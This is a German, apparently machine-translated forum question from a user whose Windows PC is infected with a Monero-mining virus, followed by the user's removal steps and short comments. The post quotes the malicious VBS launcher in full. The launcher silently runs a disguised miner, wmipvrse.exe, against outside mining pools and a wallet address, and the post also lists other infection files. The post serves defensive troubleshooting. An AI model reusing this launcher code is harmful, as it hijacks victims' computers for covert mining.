Mein Computer ist mit dem Mining-Virus infiziert und gibt mir einen Windows-Skript-Hostfehler

494
Hamza Anis

Der erste Fehler, den ich erhalten habe, war ein Windows Script Host-Fehler, der als C: \ Windows \ xdgaudio.vbs beschrieben wird

Wenn ich die Datei gefunden habe, war der Inhalt

Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0 Set WShell = Nothing 

Nachdem ich dies gesehen und den Mining-Server in Zeile 3 gefunden hatte, erfuhr ich, dass ich ein Virus erlebt habe, und dies ist ein Mining-Virus.

Schritte, die ich unternommen habe, um dieses Problem zu lösen.

  1. Hat einen tiefen Windows-Defender-Scan durchgeführt (Nichts erhalten)
  2. Scan mit Anti-Rootkit durchgeführt (Nichts erhalten)
  3. Kommentierte das gesamte VBS-Skript xdgaudio.vbs, sodass es nicht ausgeführt wird.
  4. Navigierte zu " wmipvrse.exe" im Verzeichnis " C: \ Windows \ System32 \ wbem" und stellte fest, dass dies der Windows-Dienst ist. Ich habe ihn nicht gelöscht, sondern nach der Übernahme in etwas anderes umbenannt, sodass er nicht erneut gestartet wird.

Nach den obigen Schritten sind die Fehler verschwunden

IDK, wie lange ich mit diesem Virus infiziert wurde und wie es in meinen Computer gelangte.

Meine Frage an die Community ist, mir zu sagen, ob ich vor diesem Virus gerettet bin und welche weiteren Schritte erforderlich sind, um diese und andere Viren vollständig zu entfernen und wie kann ich feststellen, ob es andere Viren gibt?

Wenn Sie andere Details benötigen, können Sie in den Kommentaren nachfragen.

Vielen Dank.

Der zuerst angezeigte Skriptfehler war dies.

Mein Computer ist mit dem Mining-Virus infiziert und gibt mir einen Windows-Skript-Hostfehler

AKTUALISIEREN:

Herausgefunden!! Kurze Antwort: Löschen Sie die Datei "servicecrsssr.vbs" aus Ihrem Windows-Verzeichnis und starten Sie dann den Computer neu. (Ich habe den PLUG trotz der Gefahr von Dateiverlust / -beschädigung tatsächlich ZIEHEN, um zu vermeiden, dass das Programm versucht, während des Herunterfahrens alle fehlerhaften Dateien neu zu schreiben.)

Eine Reihe anderer Dateien ist beteiligt, aber nach dem Löschen (oder Umbenennen) der Datei und dem Neustart war alles gut ... kein Beweis für den laufenden Mining-Prozess. Ich habe diesen Virus auf ZWEI meiner Testcomputer aufgefangen. Dies waren die einzigen Computer, an die das infizierte Laufwerk meines Kunden über USB angeschlossen wurde. Es ist immer noch ein Rätsel, wie sich dieses Ding ausbreitet! Die anderen Dateien, die beteiligt zu sein schienen, waren:

\Windows\winprs.bat \Windows\winvpr.vbs \Windows\winvprse.bat \Windows\xdgaudio.vbs \Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf 

Die * .pf-Datei schreibt sich mit neuen zufälligen Zeichen an Stelle der "x" neu, wenn Sie sie umbenennen oder löschen und neu starten - ohne einen negativen Effekt, den ich feststellen kann. Auf meinem ersten infizierten Computer habe ich ALLE Dateien oben umbenannt und nach dem Umbenennen neu gestartet. Die letzte Datei, die ich ausprobiert habe, war "servicecrsssr.vbs". Auf der zweiten infizierten Testmaschine habe ich nur die Datei "servicecrsssr.vbs" umbenannt und neu gestartet, dann war alles gut. Bitte lassen Sie mich wissen, wie das für Sie klappt. Vielen Dank!

Besonderer Dank geht an LREmerys Antwort

0
Wenn Sie wirklich besorgt sind, formatieren Sie das Laufwerk und installieren Sie Windows frisch. Ƭᴇcʜιᴇ007 vor 7 Jahren 0
In der duplizierten Frage wird der Mining-Virus-Angriff nicht erwähnt. Außerdem kann ich die Laufwerke nicht formatieren. Hamza Anis vor 7 Jahren 0
@ Ƭᴇcʜιᴇ007 Wie ist das Duplikat mit der [Wie kann ich bösartige Spyware, Malware, Adware, Viren, Trojaner oder Rootkits von meinem PC entfernen?] (Https://superuser.com/questions/100360/how-can-i-remove) -malicious-spyware-Malware-Adware-Viren-Trojaner-oder-Rootkit) Hamza Anis vor 7 Jahren 0
Dieser spezifische Virus wird nicht erwähnt, aber er enthält so ziemlich alle generischen Ratschläge, die wir Ihnen geben können, was Sie tun können. Die Verfahren für einen bestimmten Virenausbruch sind in der Regel sehr ähnlich. Mokubai vor 7 Jahren 1

0 Antworten auf die Frage